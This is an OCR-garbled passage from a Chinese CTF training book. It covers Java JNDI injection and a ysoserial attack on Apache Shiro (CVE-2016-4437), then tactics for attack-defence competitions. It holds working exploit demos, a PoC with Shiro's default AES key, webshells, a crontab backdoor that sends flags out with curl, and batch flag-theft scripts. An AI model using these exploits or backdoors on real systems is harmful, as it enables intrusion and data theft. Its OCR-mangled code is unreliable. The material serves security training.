Java Web 的 漏洞 利用 方式 与 其 他 弟 见 的 漏洞 利用 方式 有 所 不 同 ， 弟 见 的 利用 方式 包括 : 通过 HTTP 请 

求 直 接 友 包 触 友 漏 洞 (包括 表达 式 注入 ) ， 远 程 类 加 载 利用 方式 〈 单 用 的 利用 方式 为 JNDI) 。 本 市 主 

要 以 2019 年 4 月 爆 出 的 Weblogic wls9-async 组 件 RCE (CVE-2019-2725) 为 例 进行 介绍 。 
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10.2.8.1 JNDI 注 入 
1. JNDI 注 入 概述 


JNDI (Java Naming and Directory Interface，Java 命 名 与 目录 接口 ) 是 Sun 公 司 提 供 的 一 种 标 
准 的 Java 基 础 接口 。 用 户 端 使 用 此 接口 可 以 通过 名 称 寻 找 和 发 现 数据 及 对 象 ， 所 以 也 是 key-value 模 


2 


命名 服务 (Naming Service) 和 目录 服务 (Directory Service) 是 JNDI 的 关键 。 


是 一 个 实体 ， 是 将 名 称 与 值 绑 定 的 实体 ， 其 本 身 提供 了 一 种 基于 名 称 来 查找 对 象 的 工具 ， 下 
O 


el de 


目录 服务 是 特殊 的 命名 服务 ， 可 以 存储 并 碍 询 “目录 对 象 ”。 目 录 对 象 可 以 关联 对 象 的 属性 ， 目 录 服 
务 因 此 提供 对 对 象 属性 的 拓展 操作 功能 。 


为 了 在 命名 服务 和 目录 服务 中 存储 Java 对 象 ， 可 以 用 Java 序 列 化 的 方式 把 一 个 对 象 表示 成 一 串 字 节 码 
来 存储。 由 于 序列 化 后 的 字 节 码 可 能 过 大 、 过 长 ， 因 此 导致 并 不 是 所 有 的 对 象 都 可 以 绑 定 到 其 字 节 
码 。 而 JNDI Naming Reference 可 以 指定 远程 的 对 象 工 厂 来 创建 Java 对 象 ， 这样 就 解决 了 字 节 码 过 
长 而 导致 无 法 绑 定 的 问题 。 


JNDI Reference 中 有 如 下 两 个 重要 参数 。 
学 Reference Addresses: 远程 引用 地 址 ， 如 rmi://serverref。 


学 Remote Factory: 用 于 实例 化 对 象 的 远程 工 三 类， 包括 工厂 类 名 、Codebase (工厂 类 文 
件 的 路 径 ) 。 


Reference 对 象 可 以 通过 指定 工厂 来 创建 一 个 Java 对 象 ， 用 户 可 以 指定 远程 的 对 象 工 三 地址， 如果 远 
程 对 象 地 址 被 用 户 可 控 ， 束 可 能 出 现 安全 问题 ， 见 图 10-2-16。 
Attack Process 
1.Attacker binds Payload in attacker 
Naming/Directory service. 
2. Attacker injects an absolute URLto a 
vulnerable JNDI lookup method. 
3. Application performs the lookup. 


4. Application connects to attacker 
controlled N/D Service that returns 
P 


Ee 
图 10-2-16 ( 引 自 2016 年 BlackHat 的 PPT) 
首先 ， 攻 击 者 将 payload (有 效 载荷) 绑 定 到 攻击 者 控制 的 目录 服务 器 (RMI 服务 器 ) 。 然 后 ， 攻 击 
者 将 其 控制 的 目录 服务 器 的 地 址 传 入 存在 漏洞 的 服务 器 的 JNDI lookup() 方 法 。 存 在 漏洞 的 服务 器 执 
行 lookup() 方 法 后 会 连接 到 攻击 者 控制 的 目录 服务 器 (RMI 服 务 器 ) ， 返 回 攻击 者 绑 定 好 的 
， 最 后 ， 存 在 漏洞 的 服务 器 将 返回 解码 ， 并 触发 payload。 


eM/lelle 


JNDI 注 入 的 关键 在 于 动态 协议 切换 ，lookup() 方 法 允许 在 传 入 绝对 路 径 的 情况 下 动态 进行 协议 和 提供 
者 切换 。 所 以 ， 当 lookup(0 中 的 参数 是 可 控 时 ， 融 有 可 能 造成 JNDI 注 入 一 一 当然 ， 上 下 文 对 象 是 需 
通过 InitialContext 或 其 子 类 (InitialDirContext、lnitialLdapContext) 实例 化 的 对 象 。 


所 以 ，JNDI 注 入 需要 两 个 主要 的 条 件 : 
& 上 下 文 对 象 是 通过 InitialContext 及 其 子 类 实例 化 的 ， 且 其 lookup0 方 法 允许 动态 协议 切 
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换 。 
学 lookup() 参 数 可 控 。 


2. 动手 实现 JNDI demo 
下 面 展 示 笔 者 实现 的 一 个 JNDI demo， 以 便 加 强 对 JNDI 的 理解 。 
(1) 建立 存在 漏洞 的 服务 


根据 攻击 条 件 ， 简 单 提炼 出 以 下 两 点 : 建立 好 上 下 文 ，lookup() 方 法 中 的 地 址 可 控 。 例 如 


import javax.naming.Context; 
import javax.naming.InitiaLContext; 


public class VulnerableServer { 
public static void main(String[] args) throws Exception { 
String uri = "rmi://127.0.0.1:2000/Exploit"; 
Context ctx = new InitialContext(); 
ctx.lookup(uri); 
} 
} 


为 了 测试 万 便 ， 可 以 手动 更 改 传 入 lookup 的 URI 的 地 址 。 
(2) 建立 攻击 者 可 控 的 目录 服务 


攻击 者 可 控制 的 目录 服务 需要 把 自己 的 payload 的 地 址 绑 定 到 该 目录 服务 上 ， 同 时 保证 目录 服务 可 以 
访问 payload 的 地 址 : 


import com.sun.jndi.rmi.registry.ReferenceWrapper; 


import javax.naming.Reference; 
import java.rmi.registry.LocateRegistry; 
import java.rmi.registry.Registry; 


public class AttackServer { 
public static void main(String[] args) throws Exception { 
Registry registry = LocateRegistry.createRegistry(2000); 
Reference reference = new Reference("Exploit", "Exploit", "http://127.90.90.1:9999/"); 
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); 
registry.bind("Exploit", referenceWrapper); 


这 样 将 payload 位 于 攻击 者 服务 器 的 9999 端 口上 ， 同 时 目录 服务 监听 2000 端 口 ， 将 payload 绑 定 成 


Exploit 
类 (位 于 目录 服务 ) 。 


(3) Demo 效 果 


首先 ， 需 要 准备 payload : 


public class Exploit { 
public Exploit() { 
Cry 
String cmd = "open /Applications/Calculator.app"; 
final Process process = Runtime.getRuntime().exec(cmd); 
printMessage(process.getInputStream()); 
printMessage(process.getErrorStream()); 
int value = process.waitFor(); 
System.out.println(value); 
} 
catch (Exception e) { 
e.printStackTrace(); 
)， 
} 


public static void printMessage(final InputStream input) { 
new Thread(new Runnable() { 
@Override 
public void run() { 
Reader reader = new InputStreamReader(input); 
BufferedReader bf = new BufferedReader(reader); 
String Line = null; 
try { 
while ((Line=bf.readLine())!=null) { 
System.out.printLn(Line); 
} 
} 
catch (IOException e) { 
e.printStackTrace(); 
} 
} 
}) .start();: 


} 
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将 payload 部 车 到 攻击 者 目 己 的 服务 器 上 ， 并 保证 其 可 访问 ， 这 里 使 用 “php-S ”命令 开通 了 HTTP 服 
务 ， 见 图 10-2-17。 开 局 攻击 者 可 控 的 目录 服务 和 存在 漏洞 的 服务 ， 将 执行 攻击 者 上 自己 设 定 的 

p 


eM/lelle 
弹出 计算 器 ， 见 图 10-2-18。 


图 10-2-17 





图 10-2-18 
(5) 真实 环境 下 的 Demo 
在 真实 环境 中 ， 很 多 的 漏洞 都 是 通过 JDNI 的 方式 完成 利用 的 ， 下 面 用 2019 年 爆 出 的 Weblogic RCE 


(CVE-2019-2725) 作为 例子 ， 来 讲述 实际 应 用 的 方式 。 如 果 对 漏洞 本 身 感 兴趣 ， 推 荐 阅读 这 篇 文 
章 ， 可 以 扫 摘 石 侧 的 二 维 码 。 





这 个 漏洞 除了 使 用 反 序 列 化 的 利用 链 ， 还 可 以 使 用 CVE-2018-3191 漏 洞 的 利用 链 ， 将 一 个 目录 服务 
地 址 传 入 ， 从 而 造成 JDNI 注 入 ， 完 成 命令 执行 。 


在 设置 完 攻 击 者 的 目录 服务 器 后 (与 上 文 的 Demo 相同 ) ， 打 开 目 录 服 务 器 监听 痛 口 ， 殉国 1 < 
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图 10-2-19 
利用 EXP 生 成 序列 化 的 数据 ， 命 令 如 下 : 


请 求 ， 就 会 完成 JDNI 注 入 弹出 计算 器 ， 见 图 10-2-20。 
(6) 攻击 限制 


Oracle 在 jdk8u121 后 设置 了 com.sunjndi.rmi.object.trustURLCodebase=false， 限 制 了 RMI 利 用 
方式 中 从 远程 加 载 Class com.sun.jndi.rmi.registry.RegistryContext# decodeObject。 


Oracle 在 jdk8u191 后 设置 com.sun.jndi.ldap.object.trustURLCodebase=false， 限 制 了 LDAP 利 用 
是 从 远程 加 载 Class。 


对 于 jdk8u191 后 的 版 本 ，JDNI 注 入 是 非常 难以 利用 的 。 当 然 也 有 绕 过 方式 ， 但 是 限制 比较 大 ， 当 应 
用 在 Tomcat 8 上 启动 时 ， 可 以 通过 javax.el 包 进行 绕 过 。Tomcat 7 默认 不 存在 javax.el 包 ， 由 于 篇 幅 
限制 ， 这 里 不 下 次 述 ， 想 要 了 解 更 详细 的 信息 ， 可 以 参考 如 下 文献 : 


https://www.veracode.com/blog/research/exploiting-jndi-injections-java 


图 10-2-20 


10.2.8.2 反 序 列 化 利用 工具 ysoserial/marshalsec 


ysoserial/marshalsec 都 是 反 序 列 化 Gadget 合 集 ， 当 确定 了 一 个 反 序 列 化 漏洞 时 ， 需 要 向 这 个 反 序 
列 化 点 传 入 一 串 序 列 化 数据 ， 使 其 完成 反 序 列 化 并 执行 我 们 期 望 其 执行 的 操作 一 一 通常 是 命令 执行 。 
这 时 需要 一 个 可 控 的 反 序 列 化 点 和 一 个 能 完成 命令 执行 的 payload， 而 ysoserial 和 marshalsec 束 是 用 
于 生成 payload 的 工具 (具体 可 以 到 Github 查 阅 ) 。 


有 关 反 序列 化 的 内 容 前 文 已 经 有 所 说 明 ， 这 里 以 Shiro 反 序列 化 漏洞 (CVE-2016-4437) 的 例子 来 具 
体 展示 如 何 使 用 ysoserial 工 具 完 成 反 序列 化 的 攻击 。 


为 了 快速 的 搭建 漏洞 环境 ， 笔 者 这 里 直接 从 Github 上 下 载 代码 ， 部 署 到 Tomcat 中 完成 漏洞 环境 搭 
填 、、 IA 


TF Por a Sa a or a Po 
a di a rma fab 
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YiL <OIS nkPs: 779LEINUD COM/ PacTESA SHALLU .YiL 
git checkout shiro-root-1.2.4 
cd ./shiro/samples/web 


接 下 来 为 了 让 shiro 正 常 运行 ， 需 要 修改 pom.xml 文 件 ， 添 加 如 下 代码 : 


<dependency> 
<groupId>javax.servlet</groupId> 
<artifactId>jstl</artifactId> 
<!-- 这 里 需要 将 jstl 设置 为 1 .2 --> 
<version>1.2</version> 
<scope>runtime</scope> 
</dependency> 


然后 用 MVN 编 译 项 目 为 WAR 包 ， 复 制 target 目 录 下 生成 的 samples-web-1.2.4.war 至 Tomcat 目 录 下 
的 webapps 目 录 ， 这 里 将 war 包 重 命 名 为 shiro.war。 局 动 Tomcat， 访 问 http://localhost: 8080/ 车 
shiro 
， 即 可 看 到 shiro demo 已 经 启动 ， 见 图 10-2-21。 


Apache Shiro Quickstart 


Hi root! (Logout ) 

Welcome to the Apache Shiro Quickstart sample application. This page represents the home page of any web application. 

Visit your account page. 

Roles 

To show some taglibs, here are the roles you have and don't have. Log out and log back in under different user accounts to see different roles. 
Roles you have 

admin 

Roles you DON'T have 

president 

darklord 


goodguy 
schwartz 


图 10-2-21 
在 最 初 进行 漏洞 检测 时 ， 比 较 好 的 检测 方式 是 利用 ysoserial 的 URLDNS 这 个 Gadget 配 合 dnslog (这 
里 使 用 ceye) 进行 检测 。 


首先 ， 利 用 ysoserial 生 成 URLDNS 的 payload : 


java -jar ysoseriaL-master-ff59523eb6-1. jar URLDNS 'http://shiro.rrjval.ceye.io'> poc 


再 使 用 Shiro 内 置 的 默认 密 铀 对 Payload 进 行 AES 加 密 ， 具 体 代 人 码 如 下 : 


import 

import 

import base64 

import uuid 

import subprocess 

import requests 

from Crypto.Cipher import AES 


JAR_FILE = ' 本 地 ysoserial 工具 的 位 置 ' 


def poc(url, rce_command): 
EAInOE in Url 
target = 'https://%s' % url if ':443' in url else 'http://%s' % url 
else: 
target = url 
ry 
payload = generator(rce_command, JAR_FILE) 
print payload.decode() 
r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) 
print r.text 
except Exception, e: 
pass 
return False 


def generator(command, fp): 


if not os.path.exists(fp): 
raise Exception('jar file not found!') 


popen = subprocess.Popen(['java', '-jar', fp, 'URLDNS', command], 
stdout=subprocess .PIPE) 

BS = AES.bLock_size 

pad = Lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 

key = "kPH+bIxk5D2deZiIxcaaaA==" 

mode = AES.MODE_CBC 

iv = uuid.uuidy().bytes 

encryptor = AES.new(base6y.b6ddecode(key), mode, iv) 

file_body = pad(popen.stdout .read()) 

base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) 

return base64_ciphertext 


if __name__ == '__main__': 
poc(C'http://LocaLhost:8980/shiro'，'dns 慑 务 器 的 地 址 ') 


运行 poc， 即 可 在 DNS 解 析 记 录 中 看 到 请 求 记 录 了 ， 见 图 10-2-22。 


Records / DNS Query 


©@ Ts re00rd is oy sav0d or 6 hours and ornly We last O00 mems as Gspisysd 
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图 10-2-22 





图 10-2-22 ( 续 ) 


10.2.8.3 Java Web 漏 洞 利用 方式 小 结 
一 束 久 


本 节 主 要 总 结 了 JDNI 注 入 和 ysoserial 的 使 用 ， 在 现实 世界 中 的 利用 往往 通过 各 种 Gadget 组 合成 完 
的 利用 过 程 。 漏 洞 利用 最 好 的 方式 并 不 是 利用 现成 的 工具 进行 党 试 ， 而 是 理解 漏洞 的 原理 ， 然 后 完成 
构造 。 只 有 “ 知 其 然 知 其 所 以 然 ” 才 不 会 将 自己 局 限 在 小 格局 中 。 
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小 结 


随 着 时 代 的 发 展 ， 除 了 ASP 搭 建 的 网 站 ， 现 在 还 有 PHP、Java、Go、Python 等 语言 搭建 的 网 站 。 由 
于 篇 幅 所 限 ， 本 章 只 介绍 了 常见 的 PHP 和 Java 代 码 审计 。 


与 现实 世界 中 的 代码 审计 不 同 ， 在 CTF 比 赛 的 代码 审计 题目 中 ， 其 目的 多 是 审计 出 越权 、3QL 注 入 甚 
全 RCE 等 漏洞 ， 由 于 比赛 有 时 间 限 制 ， 这 融 要 求 参 赛 者 对 相关 语言 的 语法 特性 有 深入 的 了 解 ， 如 PHF 
类 的 继承 、Java 反 射 机 制 等 。 只 有 融 悉 相关 语言 ， 才 能 在 短 时 间 内 ， 从 复杂 每 多 的 代码 中 友 现 相 天 漏 
LE N= 


同时 ， 在 代码 审计 的 过 程 中 ， 有 一 个 好 看 的 IDE 环 境 往 往 会 有 事半功倍 的 效果 。 


https://weread.qq.com/web/reader/77d32500721a485577d8eeekad63251024aad61ab143c7e 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


CTF 之 线 下 赛 


第 11 草 AWD 


本 章 将 介绍 CTF 线 下 赛 最 主流 的 比赛 形式 ， 即 AWD (Attack With Defence) 攻防 赛 。 一 般 来 况 ， 
AWD 比 赛 中 通常 会 有 多 个 题目 ， 每 个 题目 对 应 一 个 gamebox (服务 器 ) ， 每 个 比赛 队伍 的 gamebox 
都 仓 企 相 同 的 漏洞 环境 ， 各 队伍 选手 通过 漏洞 获取 其 他 队伍 gamebox 中 的 flag 来 进行 得 分 ， 通 过 修 字 
自身 gamebox 中 的 漏洞 来 避免 被 攻击 ，gamebox 上 的 flag 会 在 规定 时 间 内 进行 刷新 。 同 时 ， 主 办 方 
会 在 每 轮 对 每 个 队伍 的 服务 进行 检查 ， 环 境 异常 的 会 扣除 相应 分 数 ， 扣 除 分 数 一 般 由 服务 检查 正音 的 
队伍 均 分 。 


AWD 比 赛 主 要 考察 参赛 者 以 下 三 方面 : 一 是 友 现 挖掘 漏洞 的 速度 ; 二 是 流量 分 析 、 修 补漏 洞 的 能 
力 ; 三 是 编写 脚本 目 动 化 的 能 力 。 


因为 AWD 的 技巧 繁多 ， 所 以 本 章 只 从 Web 方 面 入 手 ， 分 为 比赛 前 期 准备 、 比 赛 技 巧 (trick) 、 流 量 
分 析 、 漏 洞 修复 四 部 分 。 同 时 为 了 不 影响 比赛 平衡 ， 本 章 主 要 针对 参 攀 经 验 较 少 或 者 从 未 参 加 过 
比赛 的 读者 和 群体， 分享 一 些 基础 的 参赛 经 验 ， 一 些 奇 | ] 技 巧 还 需 参 赛 者 在 日 党 比赛 中 自行 摸索 和 交 


Nr a 
[ee ed 


书城 目录 
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11.1 比赛 丽 期 准备 


AWD 比 赛 其 实 颇 有 考察 参赛 者 手 速 的 意思 ， 所 以 比赛 正式 开始 前 的 时 间 很 关键 ， 大 致 需要 做 以 下 工 
作 : 


1. 探测 IP 范 围 
住 AWD 比 赛 中 ， 主 办 万 往往 不 会 告知 参赛 者 IP 沁 围 或 者 各 队伍 的 出 口 IP， 所 以 比赛 开始 前 的 几 分 钟 便 


可 以 利用 Nmap、Routescan 或 者 其 他 端口 扫描 工具 ， 对 当前 C 端 进行 探测 ， 以 便 在 比赛 过 程 中 快速 
编写 目 动 化 脚本 。 


2. exploit 库 的 积累 


因为 AWD 比 赛 的 Web 题 目 往 往 贴近 现实 ， 一 般 是 一 些 成 型 的 CMS 或 者 CVE 漏 洞 。 例 如 ，2018 年 网 见 
怀 总 决赛 的 Web 题 目 便 是 Drupal， 除 了 弱 口 令 ， 还 涉及 其 本 身 的 RCE 漏 洞 CVE-2018-7600。 而 网 昂 
杯 的 比赛 过 程 中 不 允许 参赛 者 访问 外 网 ， 所 以 如 果 有 平常 准备 的 exploit 脚 本 ， 便 能 够 让 参赛 者 占 得 
先 机 。 


Fb EE: 


比赛 开始 后 ， 相 信 所 有 参赛 者 都 会 立刻 进行 Web 题 目的 源码 备份 ， 却 往往 遗漏 了 另 一 个 重要 的 备份 ， 
即 数 据 库 备份 ， 其 备份 命令 也 十 分 简单 : 
为 什么 这 样 做 呢 ? 以 笔者 的 亲身 经 历来 说 ， 在 某 次 线 下 赛 中 ， 主 办 方 检测 后 台 正 常 与 否 的 依据 是 通过 
一 个 普通 用 户 登录 ， 在 没有 备份 的 情况 下 ， 笔 者 不 小 心 改 了 此 用 户 的 密码 ， 导 致 题目 服务 不 断 被 
人 外- 

扣 分 ， 但 由 于 当时 没有 进行 数据 库 备 份 ， 最 后 不 得 已 只 能 选择 扣除 一 定 分 值 ， 重 置 服务 来 恢复 
比赛 环境 。 
4. 提前 准备 的 脚本 


(1) flag 目 动 提交 脚本 


一 般 ， 比 赛 主 办 方 会 提供 相应 的 flag 提 交 API 接 口 ， 这 里 以 i 春秋 平台 的 AP| 接 口 为 例 ， 直 接 定 义 一 个 消 
效 即 可 。 


import requests 
import sys 
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reload(sys) 
sys.setdefaultencoding("utf-8") 
def post_answer(flag): 
url = "http://172.16.4.1/Common/submitAnswer' 
headers = 1{ 
'Content=Type': r'application/x-WWww-=form-urlLencoded; charset=UTF-8", 
'X-Requested-With': 'XMLHttpRequest", 
'User-Agent': r'Mozilla/5.0 (Windows NT 6.1; WOW6d4; rv:45.0) Gecko/29109191 Firefox/y5.0", 
'Referer': 'http://172.16.4.102/answer/index' 
} 
post_data = { 
'answer': flag, 
'token':'dl6bal8b829fycfae33de641b97lea8a' 
} 


re = requests.post(url = url, data = post_data, headers = headers) 


return re 


因为 AWD 比 赛 中 往往 一 轮 时 间 较 短 、 队 伍 较 多 ， 所 以 利用 脚本 上 自动 提交 是 十 分 有 必要 的 。 


(2) 漏洞 批量 利用 脚本 


人 在 AWD 比 赛 过 程 中 ， 往 往 会 有 十 几 支 甚 全 数 十 文 队伍 ， 因 为 手动 攻击 太 慢 ， 所 以 目 动 化 漏洞 利用 脚 
本 显得 尤为 重要 ， 以 2018 年 上 海 大 学 生 线 下 赛 metinfo 任 意 文件 读 取 为 例 ， 自 动 化 攻击 脚本 其 实 只 需 


要 如 下 几 行 简单 的 Python 代码 : 


while 1: 
for i in range(105,106) : 
try: 
catflag = "http://192.168.1."+str(i)+"/include/thumb.php?dir=,..././/ht./tp 
0 
checkflag = requests.get(url=catflag) 
if checkflag.status_code==200: 


print checkflag.text 
print str(i) 
print “十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 有 
except Exception,e: 
print str(i)+":"+"No" 


然后 结合 flag 目 动 化 提交 脚本 ， 便 可 以 得 到 一 个 完整 的 自动 化 攻击 提交 flag 脚 本 ， 见 图 9-1-1。 
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图 9-1-1 
同时 ， 在 一 些 比 赛 中 ， 主 办 方 为 了 照顾 部 分 选手 的 技术 实力 和 比赛 可 观 性 ， 往 往 会 在 根 目 录 直 接 预 留 
一 个 木马 ， 如 果 提 前 准备 了 相应 的 利用 脚本 ， 便 可 以 抢占 先 机 ， 人 在 此 不 再 人 敬 述 。 


(3) 好 用 的 抓 取 流量 脚本 


流量 分 析 在 本 章 也 会 单独 介绍 ， 那 么 在 主办 方 不 提供 流量 的 情况 下 ， 如 何 获 取 流 量 便 成 了 关键 ,而 网 
上 成 型 的 流量 获取 脚本 很 多 (如 Github) ， 这 里 推荐 Nu1l 主 力 Web 选 手 wupco 开 发 的 流量 获取 平 
== C3 Ra AW dy 


(4) 混淆 的 流量 脚本 


三 比赛 时 ， 为 了 混 消 视听 ， 加 大 对 手 分 析 流量 的 难 辰 ， 参赛 者 可 以 提 前 准备 一 些 混 消 流 量 脚本 ， 最 简 
单 的 方法 是 通过 sqlmap 或 者 目 动 化 攻击 过 程 中 随机 发 送 payload。 当 然 ， 流量 种 类 应 多 样 化 ， 否 则 特 
征 被 分 析出 后 ， 其 他 队伍 选手 可 以 在 其 抓 取 流 量 脚 本 中 设置 相应 过 渡 规 则 。 
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11.2 比赛 扩 巧 


11.2.1 如 何 快速 反应 
(1) 最 短 的 一 般 有 问题 


因为 AWD 比 赛 往 往 参 赛 人 员 水 平 参差 不 齐 ， 所 以 为 了 照顾 大 部 分 参赛 群体 ， 出 题 人 往往 会 设置 一 些 
简单 的 漏洞 ， 除 了 前 面 所 说 的 一 句 话 ， 还 有 下 面 这 种 任意 文件 读 取 : 


<?php readfile($_GET['url']);?> 


如 何 找到 这 种 短文 件 便 十 分 关键 。 这 里 分 享 一 个 命令 ， 可 以 快速 找到 行 数 最 短 的 文件 : 


(2) 查 杀 webshell 


AWD 比 赛 中 的 Web 题 目 中 往往 需要 参赛 者 来 getshell， 所 以 出 题 人 很 有 可 能 放 一 些 位 置 不 是 很 明显 
的 webshell， 如 在 / 礁 目 录 下 ， 那 么 这 时 可 以 用 D 盾 软件 来 全 局 扫 摘 。 当 然 ， 也 有 一 些 内 容 不 明显 的 
， 需 要 参赛 者 自行 发 掘 。 例 如 ， 在 2016 年 “4.29” 网 络 安全 周 安 恒 线 下 赛 中 便 有 这 作 个 pe 
， 只 能 依靠 参赛 者 目 行 挖掘 : 


<?php 
$str="sesa": 
$aa=str_shuffle($str).'rt'; 
@$aa($_GET[1]); 

了 上 


(3) 删除 不 死 webshell| 


音 见 的 不 死 webshell 如 下 : 


if (!file_exists($file)) { 
file_put_contents($file, $shell); 
unlink('xxx.php'); 


} 
usleep(50); 


而 删除 不 死 Webshell 的 常见 方法 的 有 以 下 两 种 。Q@ 循 环 ki 相应 进程 ， 


ps aux | grep www-data |awk '{print $2}'|xargs KiLL 


@ 创 建 一 个 与 不 死 Webshell 生 成 的 一 样 名 字 的 文件 夹 。 例 如 ， 不 死 Webshell 的 名 称 是 1.php， 那 么 使 
用 “mkdir 1.php” 命 令 即 可 。 
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11.2.2 如 何 优雅 、 持 续 地 拿 flag 


AWD 的 赛制 要 求 参 赛 者 必须 企 每 轮 都 拿 到 当前 的 flag， 如 何 持续 、 不 逢 上 友 现 地 拿 其 他 队伍 的 flag 便 成 
了 重 中 之 重 。 


1. 通过 header 头 


例如 ， 在 题目 的 config.php 中 添加 : 


那么 访问 题目 的 任何 一 个 ee 简易 效果 见 图 11-2-1。 


2. 通过 gamebox 提 交 


在 一 些 比赛 中 ，gamebox 可 以 访问 提交 flag 的 API 接 口 ， 所 以 可 以 通过 写 crontab 后 门 来 达到 隐蔽 提 
交 ， 例 如: 


* * CUFL 172.19.1.2/flag/ -d 'flag='$(cat /tmp/flag)'&token= 队 伍 token' 


3. 包含 文件 


一 些 PHP 文 件 往往 包含 JS 文件 ， 所 以 可 以 通过 “include js” 文 件 达到 getshell 的 目的 。 例 如 ， 在 某 J 
文件 夹 下 添加 enjs 文 件 ， 其 内 容 为 一 句 话 ， 在 PHP 文 件 中 直接 include 该 JS 文件 即 可 。 


4. 隐蔽 之 路 


在 一 些 404 页 面 或 者 比较 难以 友 现 的 地 万 (如 登录 ) ， 下 接 使 用 “echo cat/f* ”命令 ， 将 获取 的 flag 


瑟 对 |HHTML 标签 中 (内 图 11-2- 方 日 | 不 在 企 而 面 或 者 滞 寻 而 面 便 晶 [| 会 至 lflay ， 简 旺 效 里 见长 
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但 是 这 样 不 是 很 优雅 ， 所 以 可 以 用 HTML 标 签 将 其 隐藏 。 例 如 : 
<input type="hidden" name='<?php echo “cat /flag' ;?>' value="Sign In" class="btn btn-primary"> 


然后 源码 正则 匹配 出 flag 即 可 。 


5. Copy 的 妙用 


AWD 比 赛 的 本 质 是 获取 flag， 所 以 如 果 webshel 上 操作 太 明 显 ， 通 过 文件 操作 也 可 以 达到 相应 目的 。 
例如 ， 在 index.php 中 添加 如 下 语句 : 


copy('/fLag'，'/varVwww/htmLV .1.txt) i; 
ass="form-group"> 
<input type="Submit”name= "Su 


L | hetps/f127.0.0. 1/testi/index.phpl 


Enable Post data Enable Referrer 


LOGIN PAGE 


A 


图 11-2-3 
然后 访问 index.php 便 会 在 当前 目录 下 生成 .1.txt， 内 容 为 flag 文 件 。 当 然 ， 为 了 避免 被 其 他 队伍 发 现 
获取 ， 可 以 在 index.php 或 者 其 他 文件 中 加 入 如 下 语句 : 


if(isset($_GET['url’'])) { 
umn cD 
} 


这 样 在 读 取 flag 内 容 后 ， 了 立刻 用 GET 请 求 ， 即 可 删除 .1.txt， 避 免 被 其 他 参赛 者 发 现 利 用 。 
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6. 另类 的 webshell 


在 AWD 比 赛 中 ， 目 标 机 器 的 权限 维持 同样 重要 ， 除 了 寻 间 的 不 死 马 ， 还 有 RSA 后 门 、 隐 藏 文件 等 ， 这 
里 不 再 你 述 ， 读 者 可 以 扩 散 思维 ， 创 造 一 些 另 类 的 webshell。 例 如 ，2016 年 ZCTF 线 下 赛 的 例子 : 


extract($_GET); 
if(preg_match('/[0-9]/',$_SESSION['PHPSESSID'])) 
exit; 


if(preg_match('//|./',$_SESSION['PHPSESSID'])) 
exit; 


include Gin i_get("s ave_path")."/sess_".$_SESSION['PHPSESSID']); 
?> 


这 段 代 码 乍 看 起 来 可 能 没有 什么 危险 的 地 万 ， 但 是 仔细 一 看 ， 发 现 session 文 件 其 实 是 可 以 被 控制 
的 ， 这 样 刺 导致 了 RCE。 


7. shell 不 复 用 


在 AWD 比 赛 中 ， 题 目 权限 的 维持 大 部 分 要 依靠 webshell。 在 比赛 过 程 中 往往 会 出 现 这 种 情况 : A 参赛 
队伍 批量 化 攻击 所 有 参赛 者 的 时 候 ， 没 有 进行 shell 名 称 或 者 密码 的 随机 化 ， 导 致 其 他 参赛 队伍 (如 
D) 的 webshell 地 址 、 密 码 都 是 一 致 的 ， 这 样 会 导致 D 可 以 利用 A 的 webshell 来 对 其 他 参赛 队伍 进行 
攻击 ， 甚 至 设置 自己 的 webshell， 将 A 的 webshell 删 除 。 


而 shell 不 复 用 束 是 为 了 避免 上 述 情 况 ， 这 里 提供 一 个 比较 通用 的 解决 方案 : 


url = 'http://16.16.19.'+str(i)+ un k.html .php" 
myshellpath = "testawdveneno@NulL"+str(i) 

passis = md5(m Ws she ee 

data = {passis:'echo file_get_contents("/home/flag");'} 
ee 


可 以 看 出 ， 在 获取 相应 队伍 的 权限 后 ， 将 获取 的 shell 密 码 变 成 一 个 不 可 逆 的 MD5 值 ， 便 可 防止 自 
的 webshell 被 别人 复 用 。 


11.2.3 优势 和 务 势 


任 AWD 比 赛 过 程 中 ， 上 有 定 会 碰 到 优势 或 者 务 势 的 情况 ， 在 这 里 简单 分 享 一 些 笔者 AWD 比 赛 的 经 验 ， 
希望 对 读者 有 所 帮助 。 


1.NPC 的 重要 性 


每 场 比 赛 都 会 有机 器 人 NPC 和 角色， 其 iP 一般 是 最 后 一 个 ， 主 办 方 本 意 是 让 参赛 者 测试 发 现 的 漏洞 ， 从 

而 防止 被 其 他 参赛 者 一 开始 就 抓 到 流量 。 之 所 以 说 NPC 重 要 ， 一 是 因为 其 分 值 与 单个 参赛 队伍 的 分 信 
是 相同 的 ， 而 主办 方 一 般 不 会 管 NPC 的 服务 正常 与 否 ， 所 以 如 果 某 参赛 者 在 获取 到 NPC 的 webshell 
后 ， 可 以 对 其 漏洞 进行 修复 ， 这 样 就 可 以 独 享 NPC 的 flag 分 值 。 二 是 因为 拿 到 题目 “一 血 ” 后 ， 如 果 
没有 策略 直接 打 了 其 他 参赛 者 ， 可 能 会 被 立马 抓 到 payload， 从 而 钳 失 优势 。 
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2. 理解 比赛 规则 ， 提 升 优势 


这 里 的 优势 是 指针 对 略微 领先 的 情况 。 人 在 AWD 比 赛 中 ， 目 前 主流 的 计 分 方式 是 零 和 模式 ， 即 攻击 分 
数 均 分 、 服 务 异常 分 数 均 分 。 例 如 ，A 队 伍 只 领先 B 队 伍 微小 分 数 ， 而 A 队伍 有 B 队 伍 的 webshell， 那 
么 除了 正常 的 攻击 flag 得 分 ， 服 务 异常 分 数 其 实 也 在 考虑 沁 围 内 。 


3. 如 何 弥 补 务 势 


AWD 比 赛 中 同样 关键 的 是 参赛 者 的 心态 ， 所 以 处 于 务 势 地 位 时 ， 心 态 不 要 有 衣 ， 人 在 以 往 比 赛 中 也 有 过 
(YE SUEDE 
势 被 打 ， 我 们 也 可 以 及 时 通过 分 析 流 量 去 查看 其 他 队伍 的 payload， 从 而 进行 反 打 。 


另外， 针对 shell 复 用 的 情况 ， 如 果 目 己 的 服务 器 上 被 设置 了 shell， 除 了 立刻 删除 ， 也 要 有 这 样 的 思 
